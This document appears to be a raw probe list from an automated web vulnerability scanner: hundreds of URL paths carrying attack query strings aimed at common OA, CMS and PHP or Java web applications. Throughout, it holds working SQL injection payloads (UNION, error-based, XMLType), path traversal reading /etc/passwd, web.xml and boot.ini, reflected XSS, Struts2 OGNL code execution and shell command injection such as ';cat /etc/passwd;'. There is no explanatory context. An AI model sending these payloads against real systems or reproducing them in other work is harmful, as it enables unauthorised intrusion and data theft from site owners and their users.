/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL-- /lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg /lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001 /lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl /lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl /lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4 /lm/front/reg.jsp?sysid=../reg.jsp%00.jpg /lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23 /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23 /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20-- /lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL-- /lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271 /lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20-- /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23 /log.nsf /log/ /logfiles/ /login.action /login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')] /login.asp /login.aspx /login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1 /login.htm /login.html /login.jsp /login.php /login.php?LOGIN_USER_INCLUDE=/etc/passwd /login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg /login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003 /login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/-- /login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/-- /login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/-- /login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name= /logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test /logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test /logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /logo_curconf.php?deptname=-1'%20and%201=2%20UNION%20SELECT%201,concat(0x7c,md5(1122),0x7c),3,4,5,6,7,8,9,10,11,12%23 /logs/ /m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at /m/mazmun.php?hid=-7929%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b707a71,0x4c55737a754262714a637768596b4d724642726e685749514c6c4b66795862426a6f636c616d644c,0x7170766b71)--%20- /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility /magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27webscan%27%29;%3C/script%3E /mail/index.asp /mail/index.aspx /mail/index.jsp /mail/index.php /mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise /main.do /main/ /main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px= /main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7 /main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User-- /main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20-- /main/user/login.asp /main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml /mainpage/msglog.aspx?user=-1'%20and+1=char(106)-- /manage/ /manage/Login.asp /manage/Login.aspx /manage/Login.jsp /manage/Login.php /manage/Shop/profile/LmUserManage.aspx /manage/WAP/Other/AddDalen.aspx?menu=add /manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B// /manage/admin.php /manage/index.asp /manage/index.aspx /manage/index.jsp /manage/index.php /manage/node_article_add2.asp?menu=addnewss&qikan_id=238&node_id=1%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(106)%26CHR(109),NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20MSysAccessObjects%16 /management/status.jsp /manager.asp /manager.aspx /manager.jsp /manager.php /manager/ /manager/index.php /manager/picupload.aspx /managerNManager.action /mapi/index.php?act=my_order_update&order_id=1&tel=13912345678&name='%3E(select/**/%201%20from/**/%20(select/**/%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from/**/%20information_schema.tables%20group%20by%20x)a)%23 /mapi/index.php?requestData=eyJrZXl3b3JkIjoiJykgQU5EIChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoY29uY2F0KDB4NWMsbWQ1KDB4Nzc2NTYyNzM2MzYxNmUpKSxGTE9PUihSQU5EKDApKjIpKVggRlJPTSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIEdST1VQIEJZIFgpYSkjIiwiYWN0IjoibmVhcmJ5Z29vZHNlcyJ9 /mas/backlog/searchfile.jsp?skey=poc'%20AND%201=CHAR(106)%20-- /mas/component/group.jsp?name=poc'%20AND%201=CHAR(106)%20-- /mas/schedule.jsp?type=group&SGPID=1'+UNION+ALL+SELECT+1,CHAR(98)%2bCHAR(121)%2bCHAR(101)%2bCHAR(58)%2bCHAR(121),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1-- /mas/schedule/detailschedule.jsp?bid=poc'%20AND%201=CHAR(106)%20-- /mas/schedule/newschedule.jsp?done=save&treenode=poc'%20AND%201=CHAR(106)%20-- /mas/schedule/schedulelist.jsp?key=poc'%20AND%201=CHAR(106)%20-- /master/ /mdydecoderaction.php?DecoderID=(SELECT+1+and+ROW(1,1)%3E(SELECT+COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a) /mdydeviceaction.php?DeviceID=(SELECT+1+and+ROW(1,1)%3E(SELECT+COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)&=3&Page=3 /media/magmi/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility /meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20--- /meida/iWebRevision.jsp?name=0000%22%3E%27%3Cscript%3Ealert%28%2742873%27%29%3C/script%3E;// /member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')] /member.php?act=index /member.php?infloat=yes&handlekey=123);alert(/webscan/);// /member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360 /member/ /member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60 /member/index.php /member/index.php?ugid31=51'%20and%20'1122'='12 /member/special.php?job=show_BBSiframe&type=myatc&id=25&TB_pre=qb_pm%20where%20%201=2%20+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1))a+from+information_schema.tables+group+by+a)b%23 /members/ /mep-admin/userAction!queryUser.action?start=0&limit=10 /message.php?act=webscan' /message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time= /mfs.cgi /misc.php?mod=getuserinfo&uid=-1 /misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60 /moadmin.php?action=listRows&collection=1&find=array(1);md5(1122);exit /mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20// /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin /mobile/user.php?act=order_list /model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20-- /model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20-- /model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106)) /model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1 /module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php /module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /module/download.jsp?filename=..%5CWEB-INF%5Cweb.xml /module/exceldown.jsp?filename=..%5CWEB-INF%5Cweb.xml /module/exceldownload.jsp?filename=..%5CWEB-INF%5Cweb.xml /module/rss/rssfeed.jsp?colid=-1986 /module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2 /module/sitesearch/opr_classajax.jsp?classid=1%20UNION%20ALL%20SELECT%20NULL,CHR(100)%7C%7CCHR(58)%7C%7CCHR(118)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(121)%20FROM%20DUAL-- /module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer= /modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20-- /monitoring?part=web.xml /msgChat/download.jsp?url=msgChat/download.jsp /myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78 /myadmin/ /myly.aspx?username=test'%20and%20@@version%3E0-- /nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit /names.nsf /navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20-- /nd/transfer_nd_data_show.php?cid=-1%20and%201=2%20union%20select%20user(),md5(0x454154)%23 /netflow/servlet/CSVServlet?schFilePath=/etc/passwd /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini /nevercouldexistfilenosec /nevercouldexistfilenosec.aspx /nevercouldexistfilenosec.bak /nevercouldexistfilenosec.php /nevercouldexistfilenosec.rar /nevercouldexistfilenosec.shtml /nevercouldexistfilenosec.zip /nevercouldexistfilenosec/ /nevercouldexistfilewebsec /nevercouldexistfilewebsec.aspx /nevercouldexistfilewebsec.bak /nevercouldexistfilewebsec.php /nevercouldexistfilewebsec.rar /nevercouldexistfilewebsec.shtml /nevercouldexistfilewebsec.zip /nevercouldexistfilewebsec/ /news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html /news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106) /news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23 /news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at /news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20-- /news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C' /news/shuju/data.mdb /news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) /news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1 /news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23 /newssearch.aspx?skey=1%25'%20and%201=char(106)%20-- /nicknamelogin.jsp /nobom.php /nosec_Web_Scanner_Test.dll /notes.php?action=view&nid=1-websec /nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10 /oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0-- /oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF /oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF /oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD /oa_server/App_Pages/App_page/News_add.aspx /oa_server/App_Pages/App_page/UserSpuerAdd.aspx /oa_server/App_Pages/App_page/user_list.aspx /oa_server/App_Pages/App_page/user_update.aspx?userid=172 /oaerp/ui/sync/getContrastData.jsp?ID=-21%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20--&type=filed /oaerp/ui/sync/getSyncInfo.jsp?oneKyeDetailId=11)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(58)%2bCHAR(120),NULL%20--&act=oneKeyInfo /objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao= /old/ /onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd /opac/ajax_get_file.php?filename=../admin/opacadminpwd.php /opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL-- /opac/index.jsp?page=../web-inf/web.xml /opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL) /opac_two/application/course_manage2.jsp?action=delete&kechengmingcheng=1%25%27%20AND%207982%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2bCHAR%28101%29%2bCHAR%2899%29%2bCHAR%28102%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28115%29%2bCHAR%28107%29%2bCHAR%28118%29%2bCHAR%28113%29%29%29%20AND%20%27%25%27%3D%27 /opr_readfile.jsp?filename=opr_readfile.jsp /outImg?imgPath=/etc/passwd /outImg?imgPath=c:/boot.ini /oxoxoxoxoxoxox.com /oxoxoxoxoxoxox.com/ /page/html/?360webscan'.html /pages/Data%20Transmission%20-%20o.php?Lang=../../../../../etc/passwd%00 /pages/collections.php?addsearch=%21last1000&restypes=&archive=0&mode=resources&daylimit=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,(MID((IFNULL(CAST(md5(0xe414)%20AS%20CHAR),0x20)),1,50)),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) /pages/en/Data%20Transmission.php?Lang=../../../../../etc/passwd%00 /pages/rc_port_config_ui.php?sec=1&prefix=;cat%20/etc/passwd;echo /pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1 /pages/zh/Data%20Transmission.php?Lang=../../../../../etc/passwd%00 /pass.txt /passwd /password.txt /passwords.txt /pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test /pf.php?mediafile=/../../../../etc/passwd /pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e) /pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e) /php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt /php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23 /php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt /php/report/include/config.inc /php/report/include/ldap.inc /php/report/include/util.inc /php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe /php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe /phpMyAdmin/ /phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa] /phpMyAdmin/show_config_errors.php /phpRedisAdmin/?overview /phpcms/data/js.php?id=1 /phpinfo.php /phpmyadmin/ /phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data= /phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123 /phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI /pic.aspx?classid=60)%20and%201=char(106)%20-- /picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin 